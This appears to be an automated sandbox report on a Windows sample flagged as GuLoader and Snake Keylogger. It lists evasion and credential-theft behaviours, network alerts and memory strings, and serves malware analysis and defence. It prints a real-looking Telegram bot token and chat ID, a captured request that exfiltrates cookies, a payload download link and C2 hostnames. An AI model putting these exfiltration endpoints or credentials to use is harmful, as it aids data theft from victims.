Edit tour

Windows Analysis Report
Polylogy.exe

Overview

General Information

Sample name:	Polylogy.exe
Analysis ID:	1617932
MD5:	7661aaf5dbaccb77ebf948bc69b5725d
SHA1:	791ccb6267488a0d86891ae25be93a36a6b5bedd
SHA256:	510877d9cee23c4fc8a3f0a96b12a175f1dbe887978f43499eb1cc2d05571ffb
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

AI detected suspicious PE digital signature

Joe Sandbox ML detected suspicious sample

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Polylogy.exe (PID: 1968 cmdline: "C:\Users\user\Desktop\Polylogy.exe" MD5: 7661AAF5DBACCB77EBF948BC69B5725D)

Polylogy.exe (PID: 5568 cmdline: "C:\Users\user\Desktop\Polylogy.exe" MD5: 7661AAF5DBACCB77EBF948BC69B5725D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot8099931947:AAE1ESweRA82yXTxOE-G8GWsPBJDgGqE32Y/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "8099931947:AAE1ESweRA82yXTxOE-G8GWsPBJDgGqE32Y", "Chat_id": "5898096617\n", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.4536890444.0000000035E29000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000004.00000002.4536890444.0000000035CB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.3393295886.0000000003396000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: Polylogy.exe PID: 5568	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Polylogy.exe PID: 5568	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T12:37:00.660032+0100	2803305	3	Unknown Traffic	192.168.2.5	52932	104.21.80.1	443	TCP
2025-02-18T12:37:02.068304+0100	2803305	3	Unknown Traffic	192.168.2.5	52934	104.21.80.1	443	TCP
2025-02-18T12:37:08.132043+0100	2803305	3	Unknown Traffic	192.168.2.5	52942	104.21.80.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T12:36:58.925784+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	52930	193.122.6.168	80	TCP
2025-02-18T12:37:00.082054+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	52930	193.122.6.168	80	TCP
2025-02-18T12:37:01.347687+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	52933	193.122.6.168	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T12:36:53.667286+0100	2803270	2	Potentially Bad Traffic	192.168.2.5	52928	142.250.185.238	443	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T12:37:18.653865+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	52948	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T12:37:11.679661+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	52947	149.154.167.220	443	TCP

HTTP traffic detected: POST /bot8099931947:AAE1ESweRA82yXTxOE-G8GWsPBJDgGqE32Y/sendDocument?chat_id=5898096617%0A&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd50c1797da015Host: api.telegram.orgContent-Length: 1279

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 18 Feb 2025 11:37:11 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035E29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035CB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035CB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035E29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035CB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035CB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Polylogy.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035CB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035CB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036CD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035D92000.00000004.00000800.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000002.4536890444.0000000035E29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035E29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035D92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035D92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20a
Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035E29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot8099931947:AAE1ESweRA82yXTxOE-G8GWsPBJDgGqE32Y/sendDocument?chat_id=5898
Source: Polylogy.exe, 00000004.00000003.3521008389.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000003.3486006657.000000000550B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036CD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036CD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036CD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035E6E000.00000004.00000800.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000002.4536890444.0000000035E5F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035E6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035E69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: Polylogy.exe, 00000004.00000002.4519186708.0000000005458000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: Polylogy.exe, 00000004.00000002.4536039597.0000000034C20000.00000004.00001000.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000002.4519186708.0000000005493000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1mnB1B-kmDkD8dPIuQUjraA2liqqVYg21
Source: Polylogy.exe, 00000004.00000002.4519186708.0000000005493000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1mnB1B-kmDkD8dPIuQUjraA2liqqVYg215
Source: Polylogy.exe, 00000004.00000003.3521008389.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000002.4519186708.00000000054B6000.00000004.00000020.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000003.3521008389.00000000054CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: Polylogy.exe, 00000004.00000002.4519186708.0000000005493000.00000004.00000020.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000003.3521008389.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000003.3486006657.000000000550B000.00000004.00000020.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000003.3521008389.00000000054CC000.00000004.00000020.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000002.4519186708.00000000054AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1mnB1B-kmDkD8dPIuQUjraA2liqqVYg21&export=download
Source: Polylogy.exe, 00000004.00000003.3521008389.00000000054CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1mnB1B-kmDkD8dPIuQUjraA2liqqVYg21&export=downloade
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036CD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036CD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036CD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035D92000.00000004.00000800.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000002.4536890444.0000000035D6B000.00000004.00000800.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000002.4536890444.0000000035CFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035CFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035CFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035D92000.00000004.00000800.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000002.4536890444.0000000035D25000.00000004.00000800.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000002.4536890444.0000000035D6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: Polylogy.exe, 00000004.00000003.3521008389.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000003.3486006657.000000000550B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036CD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Polylogy.exe, 00000004.00000003.3521008389.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000003.3486006657.000000000550B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: Polylogy.exe, 00000004.00000003.3521008389.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000003.3486006657.000000000550B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: Polylogy.exe, 00000004.00000002.4538260754.0000000036CD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Polylogy.exe, 00000004.00000003.3486006657.000000000550B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: Polylogy.exe, 00000004.00000003.3521008389.00000000054DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.d
Source: Polylogy.exe, 00000004.00000003.3486006657.000000000550B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035E9F000.00000004.00000800.00020000.00000000.sdmp, Polylogy.exe, 00000004.00000002.4536890444.0000000035E90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035E9F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/4
Source: Polylogy.exe, 00000004.00000002.4536890444.0000000035E9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52932
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52938
Source: unknown	Network traffic detected: HTTP traffic on port 52947 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52936
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52931
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52946
Source: unknown	Network traffic detected: HTTP traffic on port 52948 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52944
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52928
Source: unknown	Network traffic detected: HTTP traffic on port 52929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52942
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52940
Source: unknown	Network traffic detected: HTTP traffic on port 52938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52929

Source: unknown	HTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.5:52928 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.5:52929 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:52947 version: TLS 1.2

Source: C:\Users\user\Desktop\Polylogy.exe

Code function: 0_2_00405295 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405295

Source: C:\Users\user\Desktop\Polylogy.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 0_2_0040331C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		0_2_0040331C
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_0040331C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		4_2_0040331C

Source: C:\Users\user\Desktop\Polylogy.exe

File created: C:\Windows\resources\0809

Jump to behavior

Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 0_2_00404AD2	0_2_00404AD2
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 0_2_004064F7	0_2_004064F7
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_00404AD2	4_2_00404AD2
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_004064F7	4_2_004064F7
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_052DC468	4_2_052DC468
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_052D6498	4_2_052D6498
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_052DC738	4_2_052DC738
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_052D7118	4_2_052D7118
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_052DC146	4_2_052DC146
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_052DA088	4_2_052DA088
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_052D5370	4_2_052D5370
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_052DD278	4_2_052DD278
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_052DCCD8	4_2_052DCCD8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_052DCFAB	4_2_052DCFAB
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_052D69A0	4_2_052D69A0
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_052DE988	4_2_052DE988
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_052DCA08	4_2_052DCA08
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_052D3E09	4_2_052D3E09
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_052DF961	4_2_052DF961
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_052DE97B	4_2_052DE97B
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_052D29EC	4_2_052D29EC
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BA1850	4_2_38BA1850
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BA9448	4_2_38BA9448
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BA5148	4_2_38BA5148
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BA2A90	4_2_38BA2A90
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BA1FA8	4_2_38BA1FA8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BA8CB1	4_2_38BA8CB1
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BAF080	4_2_38BAF080
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BAF4D8	4_2_38BAF4D8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BAF4C8	4_2_38BAF4C8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BA8CC0	4_2_38BA8CC0
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BAEC28	4_2_38BAEC28
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BAEC18	4_2_38BAEC18
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BA0006	4_2_38BA0006
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BAF071	4_2_38BAF071
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BA0040	4_2_38BA0040
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BA1841	4_2_38BA1841
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BACDAF	4_2_38BACDAF
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BACDC0	4_2_38BACDC0
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BA9D38	4_2_38BA9D38
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BA5138	4_2_38BA5138
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BAF930	4_2_38BAF930
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BAF922	4_2_38BAF922
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BADAB9	4_2_38BADAB9
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BADAC8	4_2_38BADAC8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BAD218	4_2_38BAD218
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BAD209	4_2_38BAD209
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BAD670	4_2_38BAD670
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BA9668	4_2_38BA9668
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BAD660	4_2_38BAD660
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BA1F98	4_2_38BA1F98
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BAE7D0	4_2_38BAE7D0
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BAE7C0	4_2_38BAE7C0
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BA0B30	4_2_38BA0B30
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BADF20	4_2_38BADF20
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BA0B20	4_2_38BA0B20
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BADF11	4_2_38BADF11
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BAE378	4_2_38BAE378
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38BAE377	4_2_38BAE377
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38D9FC18	4_2_38D9FC18
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38D981D0	4_2_38D981D0
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38D98FB0	4_2_38D98FB0
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38D97B78	4_2_38D97B78
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38D94ED0	4_2_38D94ED0
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38D972C8	4_2_38D972C8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38D9C0C8	4_2_38D9C0C8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38D94EC2	4_2_38D94EC2
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38D9F2F8	4_2_38D9F2F8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38D908F0	4_2_38D908F0
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38D922F0	4_2_38D922F0
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38D9D2F7	4_2_38D9D2F7
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38D9F2E7	4_2_38D9F2E7
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38D90498	4_2_38D90498
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38D91E98	4_2_38D91E98
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38D90489	4_2_38D90489
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38D96488	4_2_38D96488
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38D938B8	4_2_38D938B8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38D9E0B8	4_2_38D9E0B8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38D972B8	4_2_38D972B8
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38D9C0B7	4_2_38D9C0B7
Source: C:\Users\user\Desktop\Polylogy.exe	Code function: 4_2_38D91EA8	4_2_38D91EA8
